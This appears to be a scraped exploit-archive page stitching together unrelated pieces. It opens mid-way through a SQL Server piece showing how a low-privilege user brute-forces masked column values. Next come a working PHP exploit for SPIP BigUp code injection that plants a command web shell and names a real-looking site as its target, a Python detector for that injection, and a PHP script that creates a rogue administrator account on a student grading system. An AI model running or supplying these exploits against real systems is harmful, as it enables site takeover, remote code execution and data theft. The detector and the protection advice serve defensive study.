INTO [dbo].[COMPANY]<br /><br /> ([COMPANY_NAME]<br /><br /> 
,[SALES])<br /><br /> VALUES<br /><br /> ('COMPANY_B','78')<br /><br />GO<br /><br />------ I will enable the dynamic data masking function on the SALES column:<br /><br /> ALTER TABLE dbo.COMPANY<br /><br />ALTER COLUMN SALES INT MASKED WITH (FUNCTION = 'default()');<br /><br />------ Then I will create a user called reg_user that can only query the table, so the user will only see the SALES column with completely masked data [ZERO values]:<br /><br />USE [demodb]<br /><br />GO<br /><br />CREATE USER reg_user WITHOUT LOGIN;<br /><br />GRANT SELECT ON dbo.COMPANY to reg_user;<br /><br />EXECUTE AS USER = 'reg_user';<br /><br />SELECT * FROM dbo.COMPANY;<br /><br />REVERT;<br /><br /><br /><br />------ However, using the same non-privileged database account reg_user, I will be able to extract the actual values:<br /><br /><br />EXECUTE AS USER = 'reg_user';<br /><br /> DECLARE @sales_txt nvarchar(max);<br /><br /> DECLARE @LCounter INT= 1;<br /><br /> WHILE (@LCounter < 99)<br /><br /> BEGIN<br /><br />SET @sales_txt=(SELECT COMPANY_NAME+' sales is ' +CAST (@LCounter as nvarchar)<br /><br /> FROM dbo.COMPANY<br /><br /> WHERE SALES=@LCounter)<br /><br /> print @sales_txt<br /><br /> SET @LCounter = @LCounter + 1<br /><br /> END<br /><br />REVERT;<br /><br /><br />Output:<br /><br />COMPANY_A sales is 11<br /><br />COMPANY_B sales is 78<br /><br />COMPANY_C sales is 93<br /><br /><br /><br />------ Actual values were successfully extracted from the masked column!<br /><br /><br />*****************************************<br /><br />Protection Mechanisms:<br /><br />1. Ensure network firewall rules are in place so that database accounts can connect to the destination database server host only from a specific list of source hosts. This adds a good<br />security protection layer, especially if database account credentials are exposed.<br /><br />2. Implement security auditing on identified sensitive tables.<br /><br />3. 
Implement other security features alongside dynamic data masking, such as encryption; of course, the Always Encrypted feature is the best in terms of data protection.<br /><br /><br />*****************************************<br />References:<br />https://learn.microsoft.com/en-us/sql/relational-databases/security/dynamic-data-masking?view=sql-server-ver16<br />https://databasesecurityninja.wordpress.com/2023/08/08/hacking-sql-server-dynamic-data-masking-feature-with-brute-force-technique/<br />https://www.youtube.com/watch?v=NiAg0sGsGtw<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP BigUp 4.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] This exploits a PHP code injection vulnerability in the BigUp plugin of SPIP.<br /> The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value. <br /> By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server. <br /> It allows unauthenticated users to execute arbitrary code remotely via the public interface. <br /><br /><br />[+] Line 143 : Set your target & payload.<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br />class indoushka {<br /> private $targetUri;<br /> private $formPage;<br /> private $payload;<br /><br /> public function __construct($targetUri, $formPage = 'auto', $payload) {<br /> $this->targetUri = $targetUri;<br /> $this->formPage = $formPage;<br /> $this->payload = $payload;<br /> }<br /><br /> public function check() {<br /> $spipVersion = $this->getSpipVersion();<br /> if (!$spipVersion) {<br /> return "Unable to determine the version of SPIP.";<br /> }<br /> echo "SPIP Version detected: " . $spipVersion . 
"\n";<br /><br /> $vulnerableRanges = [<br /> ['start' => '4.0.0', 'end' => '4.1.17'],<br /> ['start' => '4.2.0', 'end' => '4.2.15'],<br /> ['start' => '4.3.0', 'end' => '4.3.1']<br /> ];<br /><br /> $isVulnerable = false;<br /> foreach ($vulnerableRanges as $range) {<br /> if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {<br /> $isVulnerable = true;<br /> break;<br /> }<br /> }<br /><br /> if (!$isVulnerable) {<br /> return "The detected SPIP version ($spipVersion) is not vulnerable.";<br /> }<br /><br /> echo "SPIP version $spipVersion is vulnerable.\n";<br /> return "SPIP version $spipVersion is vulnerable.";<br /> }<br /><br /> private function getSpipVersion() {<br /> // This function should make an HTTP request to detect the SPIP version<br /> // Return the version or false if undetectable<br /> return '4.3.1'; // Example version, replace with actual logic<br /> }<br /><br /> private function getFormData() {<br /> $pages = ['login', 'spip_pass', 'contact'];<br /><br /> if ($this->formPage !== 'auto') {<br /> $pages = [$this->formPage];<br /> }<br /><br /> foreach ($pages as $page) {<br /> $url = $this->normalizeUri($page);<br /> $response = $this->sendRequest('GET', $url);<br /><br /> if ($response['status'] === 200) {<br /> libxml_use_internal_errors(true); // Prevent warnings from invalid HTML<br /> $doc = new DOMDocument();<br /> @$doc->loadHTML($response['body']);<br /> libxml_clear_errors();<br /><br /> $inputs = $doc->getElementsByTagName('input');<br /> if ($inputs->length > 1) {<br /> $action = $inputs->item(0)->getAttribute('value');<br /> $args = $inputs->item(1)->getAttribute('value');<br /> <br /> if ($action && $args) {<br /> echo "Found formulaire_action: $action\n";<br /> echo "Found formulaire_action_args: " . substr($args, 0, 20) . 
"...\n";<br /> return ['action' => $action, 'args' => $args];<br /> }<br /> }<br /> }<br /> }<br /><br /> return null;<br /> }<br /><br /> private function normalizeUri($page) {<br /> return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');<br /> }<br /><br /> private function sendRequest($method, $url, $data = null) {<br /> $ch = curl_init();<br /><br /> curl_setopt($ch, CURLOPT_URL, $url);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /><br /> if ($method === 'POST' && $data) {<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)<br /> ]);<br /> }<br /><br /> $response = curl_exec($ch);<br /> $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);<br /><br /> curl_close($ch);<br /><br /> return ['status' => $httpCode, 'body' => $response];<br /> }<br /><br /> private function encodePayload() {<br /> return base64_encode($this->payload);<br /> }<br /><br /> public function exploit() {<br /> $formData = $this->getFormData();<br /> if (!$formData) {<br /> echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";<br /> return;<br /> }<br /><br /> echo "Preparing to send exploit payload to the target...\n";<br /><br /> $encodedPayload = $this->encodePayload();<br /> $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));<br /><br /> $postData = "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . 
$this->randomString() . '"' . "\r\n\r\n\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";<br /> $postData .= "--$boundary--\r\n";<br /><br /> $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);<br /> }<br /><br /> private function randomString($length = 8) {<br /> return bin2hex(random_bytes($length / 2));<br /> }<br />}<br /><br />// Usage example:<br />$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');<br />$exploit->check();<br />$exploit->exploit();<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
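<p>The injection point described in the advisory above is the Content-Disposition name of the uploaded file field, posted together with bigup_retrouver_fichiers. The Python below is an added example, not code from the advisory or from SPIP/BigUp: it parses a raw multipart/form-data body, unquotes field names the way PHP's multipart parser does (a backslash escapes the quote, the value ends at the first unescaped quote), and flags a request whose file field name carries PHP syntax once BigUp's trigger parameter is present. The boundary, the benign upload and the exploit-shaped body are constructed here, not captured traffic; the name it returns is the one BigUp would receive in $_FILES.</p>

```python
"""Flag SPIP BigUp field-name injection in a raw multipart/form-data body.

Added example: the PoC above hides PHP in the *name* of an uploaded file field
and sends it together with bigup_retrouver_fichiers. This parser unquotes
Content-Disposition parameters the way PHP's multipart parser does (backslash
escapes the quote, the value ends at the first unescaped quote), so the name it
reports is the one BigUp sees in $_FILES. Sample bodies are constructed below.
"""
import re
from typing import Dict, List, Optional

# A form field name never needs quotes, a method call or die(); those are what
# an attacker needs to break out of a PHP double-quoted string and append code.
SUSPICIOUS = re.compile(r'["\']|\.\s*[A-Za-z_]\w*\s*\(|\b(?:die|exit|eval|system|base64_decode)\s*\(')


def parse_disposition(header: str) -> Dict[str, str]:
    """Parse 'form-data; name="..."; filename="..."' into a dict (keys lower-cased)."""
    params: Dict[str, str] = {}
    i, n = 0, len(header)
    while i < n:
        while i < n and header[i] in ' \t;':          # skip separators
            i += 1
        start = i
        while i < n and header[i] not in '=;':         # key
            i += 1
        key = header[start:i].strip().lower()
        if i >= n or header[i] != '=':                 # bare token such as form-data
            continue
        i += 1
        if i < n and header[i] in '"\'':               # quoted value, PHP-style unescaping
            quote = header[i]
            i += 1
            buf: List[str] = []
            while i < n and header[i] != quote:
                if header[i] == '\\' and i + 1 < n and header[i + 1] in (quote, '\\'):
                    i += 1                             # keep the escaped char, drop the backslash
                buf.append(header[i])
                i += 1
            i += 1                                     # closing quote
            params[key] = ''.join(buf)
        else:                                          # unquoted value up to ';'
            start = i
            while i < n and header[i] != ';':
                i += 1
            params[key] = header[start:i].strip()
    return params


def parse_multipart(body: bytes, boundary: str) -> List[Dict[str, str]]:
    """Return the Content-Disposition parameters of every part in the body."""
    delimiter = b'--' + boundary.encode()
    parts: List[Dict[str, str]] = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b'--'):                    # closing delimiter
            break
        head = chunk.partition(b'\r\n\r\n')[0]
        for line in head.decode('latin-1').split('\r\n'):
            if line.lower().startswith('content-disposition:'):
                parts.append(parse_disposition(line.split(':', 1)[1].strip()))
    return parts


def find_bigup_injection(body: bytes, boundary: str) -> Optional[str]:
    """Return the offending file-field name (as PHP would see it) or None."""
    parts = parse_multipart(body, boundary)
    if not any(p.get('name') == 'bigup_retrouver_fichiers' for p in parts):
        return None                                    # BigUp's file listing is not triggered
    for part in parts:
        if 'filename' in part and SUSPICIOUS.search(part.get('name', '')):
            return part['name']
    return None


# --- constructed samples (not captured traffic) -----------------------------
BOUNDARY = '----WebKitFormBoundary0123456789abcdef0123456789abcdef'


def _part(disposition: str, value: str = '') -> bytes:
    return f'--{BOUNDARY}\r\nContent-Disposition: {disposition}\r\n\r\n{value}\r\n'.encode()


# A legitimate BigUp post: same trigger parameter, ordinary field names.
BENIGN_BODY = (
    _part('form-data; name="formulaire_action"', 'contact')
    + _part('form-data; name="bigup_retrouver_fichiers"', '1')
    + _part('form-data; name="piece_jointe[0]"; filename="rapport.pdf"', '%PDF-1.4 ...')
    + f'--{BOUNDARY}--\r\n'.encode()
)

# The exploit shape: quotes inside the name are sent as \" so PHP keeps them.
EVIL_NAME = 'abcd1234[\\".base64_decode(\'cGhwaW5mbygpOw==\').die().\\"]'
EVIL_BODY = (
    _part('form-data; name="formulaire_action"', 'contact')
    + _part('form-data; name="bigup_retrouver_fichiers"', 'zzzz')
    + _part(f'form-data; name="{EVIL_NAME}"; filename="x"')
    + f'--{BOUNDARY}--\r\n'.encode()
)

if __name__ == '__main__':
    print('benign :', find_bigup_injection(BENIGN_BODY, BOUNDARY))
    print('exploit:', find_bigup_injection(EVIL_BODY, BOUNDARY))
```

<p>Run it as a script to see both verdicts. The benign body keeps the trigger parameter but an ordinary field name, so the verdict rests on the syntax of the file field's name, not on bigup_retrouver_fichiers alone; a naive regex that stops at the first quote would report only abcd1234[ and miss the appended expression.</p>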
<pre><code>=============================================================================================================================================<br />| # Title : Online Student Grading System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.campcodes.com/projects/php/online-student-grading-system/ |<br />=============================================================================================================================================<br />
poc :<br />
[+] Dorking in Google or another search engine.<br />
[+] This payload creates a new ADMINISTRATOR account by posting the sign-up fields straight to newaccount.php:<br />
 'user' => 'indoushka',<br /> 'pwd' => 'hacked',<br />
[+] Save the payload as poc.php<br />
[+] Usage from cmd : C:\www\test>php poc.php http://target.com<br />
[+] Payload :<br />
<?php<br />
// Posts the new-account form with type=ADMINISTRATOR and reports what the server answered.<br />function add_admin_user($website) {<br />
    $post_fields = array(<br />        'page' => '',<br />        'fname' => 'nekkaa',<br />        'lname' => 'salah eddine',<br />        'user' => 'indoushka',<br />        'pwd' => 'hacked',<br />        'type' => 'ADMINISTRATOR',<br />        'qty' => '1'<br />    );<br />
    $ch = curl_init();<br />    curl_setopt($ch, CURLOPT_URL, rtrim($website, '/') . "/newaccount.php");<br />    curl_setopt($ch, CURLOPT_POST, 1);<br />    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);<br />    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />
    $response = curl_exec($ch);<br />    if ($response === false) {<br />        echo "(-) Request failed: " . curl_error($ch) . "\n";<br />        curl_close($ch);<br />        return false;<br />    }<br />    $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);<br />    curl_close($ch);<br />
    echo "(+) newaccount.php answered HTTP $status\n";<br />    echo "(+) Admin add request sent, log in with indoushka / hacked to confirm.\n";<br />    return $status;<br />}<br />
if ($argc != 2) {<br />    echo "(+) Usage: php " . $argv[0] . " <website URL>\n";<br />    echo "(+) Example: php " . $argv[0] . " http://example.com\n";<br />    exit(-1);<br />}<br />
$website = $argv[1];<br />add_admin_user($website);<br />


Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>